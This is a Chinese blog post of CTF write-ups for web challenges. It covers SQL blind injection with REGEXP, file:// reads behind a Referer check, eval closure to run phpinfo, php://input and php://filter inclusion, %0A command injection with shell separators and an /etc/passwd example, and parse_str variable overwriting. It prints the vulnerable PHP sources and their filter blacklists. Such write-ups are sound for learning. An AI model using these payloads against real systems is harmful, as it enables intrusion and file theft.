<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="持续更新，记录自己的憨批时刻 死在了flie协议读文件123456789101112131415161718192021222324252627282930&amp;lt;?php  include &quot;config.php&quot;; error_reporting(0); highlight_file(__FILE__);  $check_list = &quot;/into|load_file|0x|outfile|b">
<meta property="og:type" content="article">
<meta property="og:title" content="记一些自己的憨批做题经历">
<meta property="og:url" content="http://yoursite.com/2019/12/24/记一些自己的憨批做题经历/index.html">
<meta property="og:site_name" content="cop&#39;s blog">
<meta property="og:description" content="持续更新，记录自己的憨批时刻 死在了flie协议读文件123456789101112131415161718192021222324252627282930&amp;lt;?php  include &quot;config.php&quot;; error_reporting(0); highlight_file(__FILE__);  $check_list = &quot;/into|load_file|0x|outfile|b">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://images-cdn.shimo.im/iouMei0R9e0OtOL1/7.png__thumbnail">
<meta property="og:image" content="https://images-cdn.shimo.im/acOh4NrWYx4RRpWh/QQ%E5%9B%BE%E7%89%8720191225165013.jpg__thumbnail">
<meta property="og:image" content="https://images-cdn.shimo.im/8RuUYDkdbD0Ybhgp/QQ%E5%9B%BE%E7%89%8720191225165347.jpg__thumbnail">
<meta property="og:image" content="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1577882447590&di=6171936f15afab9b2582fab63f71a412&imgtype=0&src=http%3A%2F%2Fpic.962.net%2Fup%2F2018-7%2F20187614481320420.jpg">
<meta property="og:updated_time" content="2020-01-01T09:53:06.500Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="记一些自己的憨批做题经历">
<meta name="twitter:description" content="持续更新，记录自己的憨批时刻 死在了flie协议读文件123456789101112131415161718192021222324252627282930&amp;lt;?php  include &quot;config.php&quot;; error_reporting(0); highlight_file(__FILE__);  $check_list = &quot;/into|load_file|0x|outfile|b">
<meta name="twitter:image" content="https://images-cdn.shimo.im/iouMei0R9e0OtOL1/7.png__thumbnail">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/12/24/记一些自己的憨批做题经历/">





  <title>记一些自己的憨批做题经历 | cop's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">cop's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/12/24/记一些自己的憨批做题经历/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="cop">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="cop's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">记一些自己的憨批做题经历</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-12-24T21:35:42+08:00">
                2019-12-24
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>持续更新，记录自己的憨批时刻</p>
<h3 id="死在了flie协议读文件"><a href="#死在了flie协议读文件" class="headerlink" title="死在了flie协议读文件"></a>死在了flie协议读文件</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">include <span class="string">"config.php"</span>; </span><br><span class="line">error_reporting(0); </span><br><span class="line">highlight_file(__FILE__);  </span><br><span class="line"></span><br><span class="line"><span class="variable">$check_list</span> = <span class="string">"/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|_|\'|admin|limit|=_| |in|&lt;|&gt;|-|user|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i"</span>; </span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="variable">$check_list</span>, <span class="variable">$_POST</span>[<span class="string">'username'</span>]))&#123; </span><br><span class="line">    die(<span class="string">'&lt;h1&gt;Hacking first,then login!Username is very special.&lt;/h1&gt;'</span>);  </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="variable">$check_list</span>, <span class="variable">$_POST</span>[<span class="string">'passwd'</span>]))&#123; </span><br><span class="line">    die(<span class="string">'&lt;h1&gt;Hacking first,then login!No easy password.&lt;/h1&gt;'</span>); </span><br><span class="line">&#125; </span><br><span class="line"><span class="variable">$query</span>=<span class="string">"select user from user where user='<span class="variable">$_POST</span>[username]' and passwd='<span class="variable">$_POST</span>[passwd]'"</span>;  </span><br><span class="line"><span class="variable">$result</span> = mysql_query(<span class="variable">$query</span>); </span><br><span class="line"><span class="variable">$result</span> = mysql_fetch_array(<span class="variable">$result</span>); </span><br><span class="line"><span class="variable">$passwd</span> = mysql_fetch_array(mysql_query(<span class="string">"select passwd from user where user='admin'"</span>)); </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$result</span>[<span class="string">'user'</span>])&#123; </span><br><span class="line">    <span class="built_in">echo</span> <span class="string">"&lt;h1&gt;Welcome to CTF Training!Please login as role of admin!&lt;/h1&gt;"</span>;  </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">if</span>((<span class="variable">$passwd</span>[<span class="string">'passwd'</span>])&amp;&amp;(<span class="variable">$passwd</span>[<span class="string">'passwd'</span>] === <span class="variable">$_POST</span>[<span class="string">'passwd'</span>]))&#123; </span><br><span class="line">    <span class="variable">$url</span> = <span class="variable">$_SERVER</span>[<span class="string">"HTTP_REFERER"</span>]; </span><br><span class="line">    <span class="variable">$parts</span> = parse_url(<span class="variable">$url</span>); </span><br><span class="line">    <span class="keyword">if</span>(empty(<span class="variable">$parts</span>[<span class="string">'host'</span>]) || <span class="variable">$parts</span>[<span class="string">'host'</span>] != <span class="string">'localhost'</span>)&#123; </span><br><span class="line">        die(<span class="string">'&lt;h1&gt;The website only can come from localhost!You are not admin!&lt;/h1&gt;'</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span>&#123; </span><br><span class="line">        readfile(<span class="variable">$url</span>); </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>和2019nctf那道regexp盲注一样，不过这次跑脚本，连接超时，只好手工加burp suite爆破注<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username=\&amp;passwd=||passwd/**/REGEXP/**/<span class="string">"^d0itr1ght"</span>;%00</span><br></pre></td></tr></table></figure></p>
<p>注出来passwd是d0itr1ght<br>然后读文件的时候我憨批了，一直用http协议读，我说怎么啥也读不出来日<br>应该用file协议读文件<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file://localhost/var/www/html/flag.php</span><br></pre></td></tr></table></figure></p>
<p><img src="https://images-cdn.shimo.im/iouMei0R9e0OtOL1/7.png__thumbnail" alt><br>f12找到flag</p>
<h3 id="憨批时刻之伪随机数php版本问题"><a href="#憨批时刻之伪随机数php版本问题" class="headerlink" title="憨批时刻之伪随机数php版本问题"></a>憨批时刻之伪随机数php版本问题</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">    show_source(__FILE__); </span><br><span class="line">    include <span class="string">"flag.php"</span>; </span><br><span class="line">    <span class="variable">$a</span> = @<span class="variable">$_REQUEST</span>[<span class="string">'hello'</span>]; </span><br><span class="line">    <span class="variable">$seed</span> = @<span class="variable">$_REQUEST</span>[<span class="string">'seed'</span>]; </span><br><span class="line">    <span class="variable">$key</span> = @<span class="variable">$_REQUEST</span>[<span class="string">'key'</span>]; </span><br><span class="line">     </span><br><span class="line">    mt_srand(<span class="variable">$seed</span>); </span><br><span class="line">    <span class="variable">$true_key</span> = mt_rand(); </span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$key</span> == <span class="variable">$true_key</span>)&#123; </span><br><span class="line">        <span class="built_in">echo</span> <span class="string">"Key Confirm"</span>; </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="keyword">else</span>&#123; </span><br><span class="line">        die(<span class="string">"Key Error"</span>); </span><br><span class="line">    &#125; </span><br><span class="line">    <span class="built_in">eval</span>( <span class="string">"var_dump(<span class="variable">$a</span>);"</span>);</span><br></pre></td></tr></table></figure>
<p>本来很简单的一道题，确因为php版本问题搞了两个多小时，我真是个铁憨憨<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"><span class="variable">$seed</span>=<span class="string">'1'</span>;</span><br><span class="line">mt_srand(<span class="variable">$seed</span>);</span><br><span class="line"><span class="built_in">echo</span> mt_rand();</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>本地运行输出即为key，我用7.2版本怎么跑也跑不对<br>后来用别的师傅跑出来的看了key看了一下环境版本 5.6<br>又找了个5.6的环境跑了一下key就对了<br><img src="https://images-cdn.shimo.im/acOh4NrWYx4RRpWh/QQ%E5%9B%BE%E7%89%8720191225165013.jpg__thumbnail" alt><br>还有这题注意的一点是闭合<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>( <span class="string">"var_dump(<span class="variable">$a</span>);"</span>);</span><br></pre></td></tr></table></figure></p>
<p>可以用注释闭合 a=””);phpinfo();//<br>也可以 a=””);phpinfo(    闭合<br><img src="https://images-cdn.shimo.im/8RuUYDkdbD0Ybhgp/QQ%E5%9B%BE%E7%89%8720191225165347.jpg__thumbnail" alt></p>
<h3 id="chrome新版hackbar不支持直接传内容"><a href="#chrome新版hackbar不支持直接传内容" class="headerlink" title="chrome新版hackbar不支持直接传内容"></a>chrome新版hackbar不支持直接传内容</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$user</span> = <span class="variable">$_GET</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">"file"</span>];</span><br><span class="line"><span class="variable">$pass</span> = <span class="variable">$_GET</span>[<span class="string">"pass"</span>];</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span>(isset(<span class="variable">$user</span>)&amp;&amp;(file_get_contents(<span class="variable">$user</span>,<span class="string">'r'</span>)===<span class="string">"admin"</span>))&#123;</span><br><span class="line">    <span class="built_in">echo</span> <span class="string">"hello admin!&lt;br&gt;"</span>;</span><br><span class="line">    include(<span class="variable">$file</span>); //class.php</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="built_in">echo</span> <span class="string">"you are not admin ! "</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>就这么个简单的题，user=php://input,同时post一个admin，搞了两个小时，本地测来测去，就是不明白哪错了<br>最后感谢p3师傅点醒 <code>chrome新版hackbar不支持直接传内容</code><br>直接一个admin是传不过去的<br>太憨了嘤嘤嘤</p>
<h3 id="命令注入中的-0A"><a href="#命令注入中的-0A" class="headerlink" title="命令注入中的%0A"></a>命令注入中的%0A</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( isset( <span class="variable">$_POST</span>[ <span class="string">'Submit'</span> ]  ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    <span class="variable">$target</span> = trim(<span class="variable">$_REQUEST</span>[ <span class="string">'ip'</span> ]);</span><br><span class="line"></span><br><span class="line">    // Set blacklist</span><br><span class="line">    <span class="variable">$substitutions</span> = array(</span><br><span class="line">        <span class="string">'&amp;'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">';'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'|'</span> =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'-'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'$'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'('</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">')'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'`'</span>  =&gt; <span class="string">''</span>,</span><br><span class="line">        <span class="string">'||'</span> =&gt; <span class="string">''</span>,</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    // Remove any of the charactars <span class="keyword">in</span> the array (blacklist).</span><br><span class="line">    <span class="variable">$target</span> = str_replace( array_keys( <span class="variable">$substitutions</span> ), <span class="variable">$substitutions</span>, <span class="variable">$target</span> );</span><br><span class="line"></span><br><span class="line">    // Determine OS and execute the ping <span class="built_in">command</span>.</span><br><span class="line">    <span class="keyword">if</span>( stristr( php_uname( <span class="string">'s'</span> ), <span class="string">'Windows NT'</span> ) ) &#123;</span><br><span class="line">        // Windows</span><br><span class="line">        <span class="variable">$cmd</span> = shell_exec( <span class="string">'ping  '</span> . <span class="variable">$target</span> );</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        // *nix</span><br><span class="line">        <span class="variable">$cmd</span> = shell_exec( <span class="string">'ping  -c 4 '</span> . <span class="variable">$target</span> );</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    // Feedback <span class="keyword">for</span> the end user</span><br><span class="line">    <span class="built_in">echo</span> <span class="string">"&lt;pre&gt;&#123;<span class="variable">$cmd</span>&#125;&lt;/pre&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>直接全给过滤了，想不到啥连接符了，这次果断看其他师傅的payload，不能再像前几天那样扣几个小时，太浪费时间了<br>然后学到新姿势，%0A在url中连接命令<br>记一下普通的命令连接符<br>A&amp;B  简单的拼接，AB之间无制约关系<br>A&amp;&amp;B  A执行成功，然后才会执行B<br>A|B A的输出，作为B的输入<br>例如 cat /etc/passwd | grep /bin/bash | wc -l<br>这条命令使用了两个管道，利用第一个管道将cat命令（显示passwd文件的内容）的输出送给grep命令，grep命令找出含有“/bin /bash”的所有<br>行；第二个管道将grep的输出送给wc命令，wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash<br>A||B A执行失败。然后才会执行B<br>A;B  用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行， 彼此之间不关心是否失败， 所有命令都会执行。</p>
<h3 id="元旦的安恒赛"><a href="#元旦的安恒赛" class="headerlink" title="元旦的安恒赛"></a>元旦的安恒赛</h3><h4 id="守护"><a href="#守护" class="headerlink" title="守护"></a>守护</h4><p>一个js游戏，开着监听玩一下，死的时候转到/f1ag.php 并且post了recode=<br>把recode值改大就行了<br>这里不知道为什么直接用chrome的hackbar在/f1ag.php页面post一个recode不行，迷</p>
<h4 id="地图"><a href="#地图" class="headerlink" title="地图"></a>地图</h4><p>扫到后台登陆，看了下url猜测伪协议，试了下base64 被ban了，试一下rot13<br>php://filter/read=string.rot13/resource=index.php<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"><span class="variable">$page</span> = <span class="variable">$_GET</span>[<span class="string">'page'</span>];</span><br><span class="line"><span class="keyword">if</span> (isset(<span class="variable">$page</span>)) &#123;</span><br><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/^.+base.+$/"</span>,<span class="variable">$page</span>)) &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</span><br><span class="line">&lt;div style=<span class="string">"text-align:center"</span>&gt;</span><br><span class="line">    &lt;p class=<span class="string">"lead"</span>&gt;&lt;?php <span class="built_in">echo</span> <span class="variable">$page</span>; die(<span class="string">"&lt;/br&gt;not base"</span>);?&gt;&lt;/p&gt;</span><br><span class="line">    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</span><br><span class="line">    &lt;?php</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    ?&gt;</span><br><span class="line">    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</span><br><span class="line">    &lt;div style=<span class="string">"text-align:center"</span>&gt;</span><br><span class="line">        &lt;p class=<span class="string">"lead"</span>&gt;</span><br><span class="line">            &lt;?php</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (<span class="variable">$page</span> === <span class="string">'index.php'</span>) &#123;</span><br><span class="line">                die(<span class="string">'Ok'</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            include(<span class="variable">$page</span>);</span><br><span class="line">            die();</span><br><span class="line">            ?&gt;</span><br><span class="line">        &lt;/p&gt;</span><br><span class="line">        &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</span><br><span class="line"></span><br><span class="line">        &lt;?php</span><br><span class="line">        &#125;&#125;</span><br><span class="line">    <span class="variable">$hashed_key</span> = <span class="string">'df01c5786c5d7d83211a8f5f22f6bdb8468e23494ad698cb86c02d128473beef765952cdd5504cbe4657a6334f6b4f7b'</span>;</span><br><span class="line">    <span class="variable">$parsed</span> = parse_url(<span class="variable">$_SERVER</span>[<span class="string">'REQUEST_URI'</span>]);</span><br><span class="line">    <span class="variable">$query</span> = <span class="variable">$parsed</span>[<span class="string">"query"</span>];</span><br><span class="line">    <span class="variable">$parsed_query</span> = parse_str(<span class="variable">$query</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$parsed_query</span>!=NULL)&#123;</span><br><span class="line">        <span class="variable">$action</span> = <span class="variable">$parsed_query</span>[<span class="string">'action'</span>];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$action</span>===<span class="string">"auth"</span>)&#123;</span><br><span class="line">        <span class="variable">$key</span> = <span class="variable">$_GET</span>[<span class="string">"key"</span>];</span><br><span class="line">        <span class="variable">$hashed_input</span> = <span class="built_in">hash</span>(<span class="string">'sha384'</span>, <span class="variable">$key</span>);</span><br><span class="line">        //<span class="built_in">echo</span> <span class="variable">$hashed_input</span>.<span class="string">'\n'</span>;</span><br><span class="line">        <span class="keyword">if</span>(<span class="variable">$hashed_input</span>!==<span class="variable">$hashed_key</span>)&#123;</span><br><span class="line">            die(<span class="string">"no way to get flag!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">echo</span> file_get_contents(<span class="string">"/flag"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">        ?&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure></p>
<p>非预期解flag在根目录直接读就行file:///flag</p>
<p>预期应该是parse_str变量覆盖,覆盖hashed_key<br>先说一下parse_url<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$url</span> = <span class="string">"http://www.baidu.com/suning?v=1&amp;k=2#id"</span>; </span><br><span class="line"><span class="variable">$parts</span> = parse_url(<span class="variable">$url</span>); </span><br><span class="line">= <span class="string">"http://www.baidu.com/suning?v=1&amp;k=2#id"</span>; </span><br><span class="line"><span class="variable">$parts</span> = parse_url(<span class="variable">$url</span>); </span><br><span class="line">输出: </span><br><span class="line">Array </span><br><span class="line">( </span><br><span class="line">[scheme] =&gt; http </span><br><span class="line">[host] =&gt; www.baidu.com</span><br><span class="line">[path] =&gt; /suning</span><br><span class="line">[query] =&gt; v=1&amp;k=2</span><br><span class="line">[fragment] =&gt; id</span><br><span class="line">)</span><br></pre></td></tr></table></figure></p>
<p>payload:?action=auth&amp;key=1&amp;hashed_key=47f05d367b0c32e438fb63e6cf4a5f35c2aa2f90dc7543f8a41a0f95ce8a40a313ab5cf36134a2068c4c969cb50db776<br><img src="https://timgsa.baidu.com/timg?image&amp;quality=80&amp;size=b9999_10000&amp;sec=1577882447590&amp;di=6171936f15afab9b2582fab63f71a412&amp;imgtype=0&amp;src=http%3A%2F%2Fpic.962.net%2Fup%2F2018-7%2F20187614481320420.jpg" alt></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/12/23/第一届金盾杯&gxyctf/" rel="next" title="第一届金盾杯&gxyctf">
                <i class="fa fa-chevron-left"></i> 第一届金盾杯&gxyctf
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/01/11/SUCTF刷题记录/" rel="prev" title="SUCTF刷题记录">
                SUCTF刷题记录 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">cop</p>
              <p class="site-description motion-element" itemprop="description">cop's blog</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
